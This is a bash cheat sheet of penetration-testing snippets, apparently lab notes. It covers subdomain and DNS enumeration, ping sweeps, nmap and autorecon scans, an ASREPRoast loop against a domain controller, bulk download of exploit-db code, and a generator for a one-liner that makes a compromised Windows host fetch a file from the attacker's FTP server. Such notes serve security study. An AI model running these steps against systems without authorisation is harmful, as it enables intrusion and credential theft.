# Bash Voodoo

**#Figure out whether the last command worked or not**

```
# Exit status of the previous command: 0 means it succeeded, anything else is a failure code.
printf '%s\n' "$?"
```

**#Find out whether a given domain resolves**

```
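# `host` exits non-zero when the lookup fails, so the echo only runs on a successful resolution.
# (The original used curly “ ” quotes, which the shell treats as literal characters, not quoting.)
if host target.com; then echo "It Resolves"; fi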
```

**#enumerate subdomains**

```
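# One candidate label per line in subdomains.txt. `read -r` keeps backslashes literal, and
# `|| [[ -n "$sub" ]]` still processes a final line that has no trailing newline.
while read -r sub || [[ -n "$sub" ]]; do echo "$sub.sbtuk.net"; done < subdomains.txt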

#create subdomains.txt separately (e.g. with touch); the file contains one name per line:
admin
test
qa
dev
www
m
blog
```

**#Bruteforce subdomains | chmod 777 (chmod +x is enough and avoids making the script world-writable) and run**

```
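#!/bin/bash
# Reads one candidate label per line from subdomains.txt and prints the names that
# resolve under the target domain (defaults to yahoo.com; pass another domain as $1).
domain=${1:-yahoo.com}

while read -r sub || [[ -n "$sub" ]]; do
  [[ -z "$sub" ]] && continue      # a blank line would query ".$domain" itself
  if host "$sub.$domain"; then
    echo "$sub.$domain"
  fi
done < subdomains.txt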

```

**#Resolving CNAMES script  | cnames.sh**

```
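#!/bin/bash
# cnames.sh <domain>
# Reads subdomain labels from stdin (e.g. the subdomains.txt list above), looks up the
# CNAME of <label>.<domain> and reports aliases whose target no longer resolves — the
# usual sign of a dangling DNS record that should be cleaned up. Output is informational;
# verify each hit by hand.
#
# Note: the shebang has to be the very first line of the file for `./cnames.sh` to work.

domain=${1:?usage: $0 <domain>}

while read -r sub || [[ -n "$sub" ]]; do
  [[ -z "$sub" ]] && continue
  # `host -t CNAME` prints "<name> is an alias for <target>."; keep only the target.
  cname=$(host -t CNAME "$sub.$domain" | grep 'an alias' | awk '{print $NF}')
  if [[ -z "$cname" ]]; then
    continue
  fi
  if ! host "$cname" &> /dev/null; then
    echo "$cname did not resolve ($sub.$domain)"
  fi
done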
               
```

**#Chain the scripts: feed subdomains.txt into cnames.sh for yahoo.com**

```
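# Redirect the list into the script instead of `cat file | ...`: same input, one process fewer.
./cnames.sh yahoo.com < subdomains.txt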
```

**#export IP variable**

```
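# Set the target once and reuse it; quote "$IP" so an empty or odd value never splits into extra arguments.
export IP=192.168.101.57
nmap -sC -sV -oA quick "$IP"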
```

**#Repeat the last command**

```
# `!!` re-runs the previous command. `!n` re-runs history entry number n, so `!1`
# re-runs the FIRST entry shown by `history`, not the last one; for "n commands back"
# use `!-n` (e.g. `!-1`). Run `history` first before trusting a number.
!1

OR

!!
```

**#Reverse-i search**

```
press Ctrl+R, then type dpkg (to search the history for dpkg)
```

**#History tricks**

```
# Keep the shell history useful: drop consecutive duplicate entries.
HISTCONTROL=ignoredups
export HISTCONTROL

# Colon-separated patterns that are never written to history:
# "&" is the previous line, the rest are common one-word commands.
HISTIGNORE="&:ls:[bf]g:exit:history"
export HISTIGNORE
```

**#Assign a command to a variable**

```
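# Capture a command's stdout in a variable; quote it on expansion so the value is never word-split.
user=$(whoami)

printf '%s\n' "$user"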
```

**#URL generator script**

```
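#!/bin/bash
# Appends one URL per city/digit/digit combination (600 lines) to password.txt.
# The original wrote "http://example/com/…", a typo for example.com.
# Redirecting once at the outer loop keeps the file open for the whole run
# instead of reopening it for every line.
for city in tokyo beijing newyork rome bangkok osaka; do
  for j in {0..9}; do
    for k in {0..9}; do
      echo "http://example.com/$city/$j/$k"
    done
  done
done >> password.txt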
```

**#ping sweep script**

```
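#!/bin/bash
# Ping sweep: one ICMP echo request per host listed in ips.txt (one address per line).
# `host`/`ping` each take about a second, so 255 sequential runs are slow; the trailing
# `&` starts every ping in the background and the final `wait` collects them all, so
# the script does not return while pings are still printing.

while read -r ip || [[ -n "$ip" ]]; do
  [[ -z "$ip" ]] && continue
  ping -c 1 "$ip" &
done < ips.txt
wait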
```

**#Print out all IPs in a given subnet**

```
# Prints 10.11.1.1 through 10.11.1.10, one per line.
for ip in $(seq 1 10); do printf '10.11.1.%s\n' "$ip"; done

#Variation with braces instead of seq to specify a range

# Same idea with a brace range: 10.11.1.0 through 10.11.1.255.
for i in {0..255}; do printf '10.11.1.%s\n' "$i"; done

#Same output but using a while loop instead
#-lt stands for "less than"
#(prints 1 - 9 and excludes 10)


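#!/bin/bash
# while loop example: prints 10.11.1.1 … 10.11.1.9 and stops once counter reaches 10.
counter=1
while [[ "$counter" -lt 10 ]]; do
  echo "10.11.1.$counter"
  counter=$((counter + 1))   # plain arithmetic assignment; `((counter++))` returns 1 when counter was 0
done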

#Create a list of hosts and redirect output to a list.txt
#This command will print out all possible addresses in Lab subnet 

# Every host address of the /24 (10.11.1.0 … 10.11.1.254) to stdout.
for i in {0..254}; do printf '10.11.1.%s\n' "$i"; done


#Redirecting output to a file
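# Redirect once at the loop instead of reopening list.txt on every iteration.
for i in {1..10}; do echo "10.11.1.$i"; done >> list.txt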


```

**#wget a given target and use grep/bash to filter for subdomains**

```
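# Fetches the front page into ./index.html. Nothing here needs root, so run it as yourself
# (the downloaded file is then owned by you rather than root).
wget www.megacorpone.com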

#use grep “href=” to extract all the lines in index.html that contain HTML links

# Every line of the page that contains a link; fixed-string match, no regex needed.
grep -F 'href=' index.html

#beautify the output

# The same filter chain folded into one awk program: keep link lines under .megacorpone,
# drop the www host, and print whatever follows "http://".
awk -F 'http://' '/href=/ && /\.megacorpone/ && !/www\.megacorpone\.com/ { print $2 }' index.html

#using cut to only leave subdomains

# As above, but keep only the host part: everything before the first "/" of what follows "http://".
awk -F 'http://' '/href=/ && /\.megacorpone/ && !/www\.megacorpone\.com/ { split($2, part, "/"); print part[1] }' index.html

#grep -o returns the string defined in the regular expression

# -o prints only the matching text; sort -u leaves each host name once, written to list.txt.
grep -o -- '[^/]*\.megacorpone\.com' < index.html | sort -u > list.txt

#'[^/]*\.megacorpone\.com' is the pattern: any run of non-slash characters followed by .megacorpone.com

```

**#DNS recon scripts**

```
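# Write the whole /24 to list.txt, opening the file once for the loop rather than once per line.
for i in {0..255}; do echo "10.11.1.$i"; done >> list.txt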

#Then, resolve each entry in the list:

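# Look up each entry of list.txt line by line instead of word-splitting $(cat ...).
while read -r url || [[ -n "$url" ]]; do host "$url"; done < list.txt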

#Parse through output grepping for available addresses

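# Same loop, keeping only resolved addresses: "<name> has address A.B.C.D" -> field 4.
while read -r url || [[ -n "$url" ]]; do host "$url"; done < list.txt | grep "has address" | cut -d " " -f 4 | sort -u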

```

**#Using curl**

```
#Similar to wget technique but with curl

# Collect host names from the page's links (third "/"-separated field of each href line)
# and save the unique ones to ./test.
curl -s https://www.cisco.com \
  | grep 'href=' \
  | cut -d '/' -f 3 \
  | grep 'cisco.com' \
  | cut -d '"' -f 1 \
  | sort -u > test

#Beautify output
# Let grep -o extract the host names directly, then de-duplicate.
curl -s https://www.cisco.com \
  | grep -o -- '[A-Za-z0-9\._-]*\.*cisco\.com' \
  | sort -u

#Parsing with grep
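# Resolve each unique host name the page links to, reading the list line by line
# rather than word-splitting a $(...) result.
curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u \
  | while read -r url; do host "$url" | grep 'has address' | cut -d' ' -f4; done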

```

**#Running Autorecon against an entire subnet**

```
#Use an nmap sweep over the subnet (note: without -p- nmap scans only its default port list, not all 65535 ports)

# Aggressive scan of the whole /24, keeping only hosts with open ports, saved in grepable form.
nmap -A --open -oG Available_nmap-scan_10.11.1.1-254 10.11.1.0/24

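# Header/footer lines of -oG output mention "Nmap"; on the remaining lines field 2 is the host address.
# One awk pass replaces `cat | grep -v | awk`.
awk '!/Nmap/ { print $2 }' Available_nmap-scan_10.11.1.1-254 | sort -u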
 
#Redirect output to another file  --> targets.txt 
 
 
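# Same extraction as above, written to targets.txt (no `cat`; awk reads the file directly).
awk '!/Nmap/ { print $2 }' Available_nmap-scan_10.11.1.1-254 | sort -u > targets.txt

# Hand the de-duplicated target list to autorecon.
autorecon targets.txt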

```

**#Workaround to use nmapAutomator against a subnet**

```
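# One nmapAutomator run per target, all in the background, then wait for every run to finish
# so the shell does not return while scans are still writing.
# NOTE(review): every run gets the same `-o scan.txt`; if that is an output file rather than a
# directory, the parallel runs will overwrite each other — confirm before relying on the result.
while read -r ip || [[ -n "$ip" ]]; do
  [[ -z "$ip" ]] && continue
  bash /usr/local/bin/nmapAutomator.sh --host "$ip" --type Full -o scan.txt &
done < targets.txt
wait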
```

**#Reverse lookup script**

```
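#!/bin/bash
# Reverse lookup across a /24: prompts for the first three octets and runs
# `host -l` against <subnet>.1 … <subnet>.254.

printf '%s\n' "Please enter first 3 octets. e.g 192.168.1"
read -r subnet

# Accept only three dotted numbers; anything else would be handed to host as-is.
if [[ ! "$subnet" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
  printf 'expected three octets like 192.168.1, got: %s\n' "$subnet" >&2
  exit 1
fi

i=1
while [[ "$i" -le 254 ]]; do
  host -l "$subnet.$i"
  i=$((i + 1))
done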
```

#### #check ASREPRoast for all domain users (without credentials)

```
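# One account name per line in users.txt; read it line by line instead of word-splitting $(cat ...),
# and quote the expansions so a name with unusual characters stays a single argument.
while read -r user || [[ -n "$user" ]]; do
  [[ -z "$user" ]] && continue
  GetNPUsers.py -no-pass -dc-ip 10.10.10.161 "domain/${user}" | grep -v Impacket
done < users.txt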
```

**#Bash customization |  edit /etc/bash.bashrc with root privileges**

```
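# /etc/bash.bashrc is system-wide, so editing it needs root; a personal alias belongs in ~/.bashrc,
# which needs no elevated privileges at all.
nano /etc/bash.bashrc

# No spaces around "=": with them bash reads `gobustLin`, `=` and the rest as alias *lookups*
# and defines nothing. Single quotes keep $ip unexpanded until the alias is actually used.
# NOTE(review): `-e u` looks like a typo — in gobuster v3 `-e` (--expanded) takes no argument;
# confirm against `gobuster dir --help` before keeping the stray `u`.
alias gobustLin='sudo gobuster dir -e u --url "http://$ip/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip'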

```

**#Search for a given exploit and download all matches**

```
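#!/bin/bash
# Downloads every exploit-db entry that matches the search terms (replace "redcliff debian").
# `searchsploit -w` prints the exploit-db URL of each hit; the raw file sits at the same path
# with "exploits" replaced by "raw", and the trailing numeric id becomes the local file name.
# Lines are read one at a time (read trims the padding that `cut -d "|"` leaves) instead of
# word-splitting the whole result in a for loop.
searchsploit redcliff debian -w -t | grep http | cut -f 2 -d "|" \
  | while read -r e; do
      [[ -z "$e" ]] && continue
      exp_name=${e##*/}          # last path component (the exploit id), as `cut -d / -f 5` did
      url=${e/exploits/raw}      # first occurrence only, same as sed 's/exploits/raw/'
      # TLS verification stays on: fetching exploit code with --no-check-certificate lets
      # anyone on the network path swap the file you run.
      wget -q "$url" -O "$exp_name"
    done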
```

**#FTP script to spawn a one-liner for downloading**

```
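#!/bin/bash
# Prints a one-liner to paste into a Windows host; it writes an ftp script (ftp.txt)
# there and runs it to download one file from this machine's ftp server.
# Port, username, password and file name are read interactively from stdin.
# The credentials appear in clear text on this terminal and in ftp.txt on the
# remote side, so use throwaway ones.

# Text coloring (ANSI escapes). printf '%b' interprets them, as `echo -e` did.
yellow='\033[1;33m'
nc='\033[0m'

printf '\n%b\n\n' "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script."

# change tun0 to your interface if needed
# Take the first "inet " line (IPv4 only; "inet6" does not match) and strip the "addr:"
# prefix older ifconfig versions print, so the parse does not depend on column widths.
ip=$(ifconfig tun0 | awk '/inet / { sub(/^addr:/, "", $2); print $2; exit }')
if [[ -z "$ip" ]]; then
  printf 'Could not read an IPv4 address from tun0; check the interface name\n' >&2
fi
printf '%b\n\n' "Using IP address of tun0: $ip"

printf '%b\n' "What port do you want the ftp server to run on? Hit enter for default of 21${nc}"
read -r port
ftpport=${port:-21}   # empty answer -> default port 21

printf '\n%b\n' "${yellow}Enter the username: ${nc}"
read -r user
printf '\n%b\n' "${yellow}Enter the password: ${nc}"
read -r pass

printf '\n%b\n' "${yellow}What file do you want the remote host to download?${nc}"
read -r file

printf '\n%b\n\n' "${yellow}Paste the below to create a ftp script and run it:${nc}"
# Plain %s: the one-liner is printed literally, exactly as it must be pasted.
printf '%s\n\n' "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt"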

```
